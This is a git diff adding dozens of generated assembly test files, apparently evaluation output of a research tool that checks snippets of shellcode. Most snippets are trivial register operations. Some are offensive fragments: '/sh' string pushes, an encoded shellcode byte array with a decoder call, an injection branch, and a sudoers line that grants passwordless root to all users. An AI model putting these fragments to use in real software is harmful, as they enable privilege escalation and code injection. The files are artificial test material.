Errors/executables/GT_542.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.asm new file mode 100644 index 0000000000000000000000000000000000000000..3b6610202d9be476cb6902709ff4482f4c271224 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + mul edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.obj new file mode 100644 index 0000000000000000000000000000000000000000..b047d8ff9a8f143a43243c5d98e51b37b116d20f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_546.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.asm new file mode 100644 index 0000000000000000000000000000000000000000..13308218e4ba15c6f4aed57e58c947f7ccdb1d4b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x68732f2f + push 0x2f656c2d + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.obj new file mode 100644 index 0000000000000000000000000000000000000000..7914831e7a4ea114114fff7432cc608ff15da22c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_555.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_558.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_558.asm new file mode 100644 index 0000000000000000000000000000000000000000..1a8c1613868a2d925f6a5b745877cd9dc993779b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_558.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + scasd + l1 IncAddr + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.asm new file mode 100644 index 0000000000000000000000000000000000000000..08b2732b5970c29e4c7781ece680384d8598a409 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.obj new file mode 100644 index 0000000000000000000000000000000000000000..d2b277747c5fa6760cf123624cf2ebfb778cbbcb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_56.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.asm new file mode 100644 index 0000000000000000000000000000000000000000..d04c26629320d8d870eab8d15e552cc38eaf0ed6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _ip equ 0x0100007f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.obj new file mode 100644 index 0000000000000000000000000000000000000000..9187c5081444d19abe2c7380afa19d82a204c7f1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_560.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.asm new file mode 100644 index 0000000000000000000000000000000000000000..913d753fda755335af560938f317c57f7c7e6e24 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + mov ebx, eax + mov ecx, eax + mov edx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.obj new file mode 100644 index 0000000000000000000000000000000000000000..3de2e20b1fcbf35d302a10060464bacec5acc3c1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_565.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.asm new file mode 100644 index 0000000000000000000000000000000000000000..f8698225e39d24ed76b8f2728749e2edfd2a0ff9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [esi + 1], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.obj new file mode 100644 index 0000000000000000000000000000000000000000..aac402548a1a908d73a4a36e723f0d6b7fb9b3bd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_566.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.asm new file mode 100644 index 0000000000000000000000000000000000000000..57f83c67a11f86dc5888313e78fa07df07a9eba5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0xb + pop eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.obj new file mode 100644 index 0000000000000000000000000000000000000000..dd9fa929a0619a836e0f7238656b16da2a13854d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_567.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.asm new file mode 100644 index 0000000000000000000000000000000000000000..f0fb23c4500f87f2ecc2fb64671517999e2246d5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + or eax, 0xffffffff + not eax + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.obj new file mode 100644 index 0000000000000000000000000000000000000000..384f668741f811469335900e0eb597f30c13f546 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_568.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.asm new file mode 100644 index 0000000000000000000000000000000000000000..dca933d5315806999e6a2dc852acfa9b30486939 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.asm @@ -0,0 +1,14 @@ +section .data + +decoder equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + call decoder + shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.obj new file mode 100644 index 0000000000000000000000000000000000000000..ab5d50c171228308f966d94c309385bd975db322 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_570.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.asm new file mode 100644 index 0000000000000000000000000000000000000000..7f01b3a7ac650ca529fc4b6d02b3694e619afa4b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.asm @@ -0,0 +1,13 @@ +section .data + +exi equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + ja exi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.obj new file mode 100644 index 0000000000000000000000000000000000000000..0cea407aeed68c1a1fdf22ecce56847555d97d1c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_575.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.asm new file mode 100644 index 0000000000000000000000000000000000000000..16ee54cb357837c4dad051667d403cd3c3310b1d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, dword 0x65676760 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.obj new file mode 100644 index 0000000000000000000000000000000000000000..f61492000691145f138fc4b2864035865978f69c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_579.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.asm new file mode 100644 index 0000000000000000000000000000000000000000..f29542d9aea4e71d5bfd850bc5957201f78b9217 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub eax, 3 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.obj new file mode 100644 index 0000000000000000000000000000000000000000..e10a61e16279334c302a8ac0a6896909ed20ec2e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_581.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.asm new file mode 100644 index 0000000000000000000000000000000000000000..322a6529f75f905f93680209a34a80969db7dc63 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _file: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.obj new file mode 100644 index 0000000000000000000000000000000000000000..45e957293eadacac315848449d82f25482b329c1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_582.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.obj new file mode 100644 index 0000000000000000000000000000000000000000..23f3764c99f4dba9dde8cde6ae5e55566e6c4284 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_583.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.asm new file mode 100644 index 0000000000000000000000000000000000000000..ceba911a34348eaf91edfc74d921743b25b77f14 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.asm @@ -0,0 +1,14 @@ +section .data + +do_inject equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp BYTE al, 2 + je do_inject + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.obj new file mode 100644 index 0000000000000000000000000000000000000000..609c4102cd61c0b1e57b12f68515c4ccb3416d00 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_585.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.asm new file mode 100644 index 0000000000000000000000000000000000000000..12b643390dd139f1cdcf63d4908cebba40433cb8 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.asm @@ -0,0 +1,13 @@ +section .data + +exit equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + je exit + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.obj new file mode 100644 index 0000000000000000000000000000000000000000..02d847fd110f6456992ad2e440eb5742ab602114 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_587.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.asm new file mode 100644 index 0000000000000000000000000000000000000000..90cfdfe36b22519e291eb10f1547b0742e57938c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + mov edx,esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.obj new file mode 100644 index 0000000000000000000000000000000000000000..3e664d72381c0b384c40dac7f1caba5fc49318da Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_590.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.asm new file mode 100644 index 0000000000000000000000000000000000000000..ab1453e4e95633f7e79138f939d2b48df17f190c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push word 0x0a + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.obj new file mode 100644 index 0000000000000000000000000000000000000000..6c2c03a98ace793c1430171c4049294bb4382137 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_63.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.asm new file mode 100644 index 0000000000000000000000000000000000000000..5f8ab6ccd8ab3c32f9ea883e9d500a80b0cf9487 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + db 'all all=(all) nopasswd: all', 0xa + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.obj new file mode 100644 index 0000000000000000000000000000000000000000..bbde06bee66cebd01101841942057cb889e5d7b0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_64.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.asm new file mode 100644 index 0000000000000000000000000000000000000000..c07d8063a8b04b5199f502914c1fc1bbc2544778 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov[esi+39], ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.obj new file mode 100644 index 0000000000000000000000000000000000000000..c83f0c89853525953fbac3d8960ef95fe1ae6e5b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_66.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.asm new file mode 100644 index 0000000000000000000000000000000000000000..194d1b4b555f37e7f2e193d0fa2ca486883f3bc3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + xor ebx, ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.obj new file mode 100644 index 0000000000000000000000000000000000000000..b060bc97ec06eb4420d4de36b3b5fbae86f0b3be Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_7.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.asm new file mode 100644 index 0000000000000000000000000000000000000000..c2a966aae69125d984a656f0d23d0f1785f1fa3c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + zero1a: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.obj new file mode 100644 index 0000000000000000000000000000000000000000..a9d127866e2eb464e49e4a766692a289c3eed7c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_70.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_71.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_71.asm new file mode 100644 index 0000000000000000000000000000000000000000..332acc6e73127bcd95553a0cd846530840fd4b08 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_71.asm @@ -0,0 +1,15 @@ +section .data + +loop equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp edx, 0x43 + ja loop + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.asm new file mode 100644 index 0000000000000000000000000000000000000000..17c59ce6050811c8131d0787e5618baee9a758fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .text + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.obj new file mode 100644 index 0000000000000000000000000000000000000000..159931e2df57240009ded1710ec19d6712a4be89 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_73.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.asm new file mode 100644 index 0000000000000000000000000000000000000000..830803c390ef1bdae629012fceb3e8df00c87e77 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push word 0x3582 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.obj new file mode 100644 index 0000000000000000000000000000000000000000..df2ef7ae7d89a9ca8580181ac7ebce83688d13f5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_75.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.asm new file mode 100644 index 0000000000000000000000000000000000000000..08298ff454151a71ef88fdff712e0ea7359e43e2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov bl, 0x01 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.obj new file mode 100644 index 0000000000000000000000000000000000000000..75379afece7e219ad40c8352e79810f96c73f6ee Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_78.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.asm new file mode 100644 index 0000000000000000000000000000000000000000..b8ff87a5bcf0f483efeb764091d1675b74dadbb8 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub bl, al + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.obj new file mode 100644 index 0000000000000000000000000000000000000000..584638581309a632ebb80052554f88450bcefb36 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_8.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.asm new file mode 100644 index 0000000000000000000000000000000000000000..62f2fb30285c26779e9d47bb8e1583e1b716d4a2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor byte [esi+1], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.obj new file mode 100644 index 0000000000000000000000000000000000000000..31d00d3dae74756dbaeef9a2098d7412aa057337 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_81.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.asm new file mode 100644 index 0000000000000000000000000000000000000000..495a9f7f890b15585e516bf6257a0444e5b9d631 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_82.asm @@ -0,0 +1,14 @@ +section .data + +encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, dl + je 